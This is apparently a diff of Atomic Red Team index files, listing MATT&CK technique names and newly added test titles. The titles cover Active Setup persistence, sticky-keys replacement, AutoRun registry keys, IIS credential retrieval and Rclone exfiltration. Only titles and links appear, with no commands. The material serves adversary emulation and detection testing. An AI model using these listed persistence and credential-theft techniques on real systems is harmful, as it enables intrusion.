- Atomic Test #1: Add a driver [windows]
|
||||
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
|
||||
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
|
||||
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
|
||||
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
|
||||
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
|
||||
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
|
||||
@@ -927,6 +938,7 @@
|
||||
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
|
||||
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
|
||||
- Atomic Test #2: Replace binary of sticky keys [windows]
|
||||
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
|
||||
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
|
||||
@@ -980,6 +992,8 @@
|
||||
- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
|
||||
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
|
||||
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
|
||||
- Atomic Test #1: Authentication Package [windows]
|
||||
- T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1156,6 +1170,8 @@
|
||||
- Atomic Test #1: Gsecdump [windows]
|
||||
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
|
||||
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
|
||||
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
|
||||
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
|
||||
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
|
||||
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
|
||||
@@ -1714,4 +1730,5 @@
|
||||
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
|
||||
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
|
||||
- Atomic Test #6: MAZE FTP Upload [windows]
|
||||
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution: Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -34,7 +34,7 @@
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Boot or Logon Autostart Execution: Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
@@ -19,11 +19,11 @@
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Access Control](../../T1548.002/T1548.002.md) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Window Discovery](../../T1010/T1010.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Kubernetes Exec Into Container](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
@@ -177,7 +177,7 @@
| | | | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
@@ -13,9 +13,9 @@
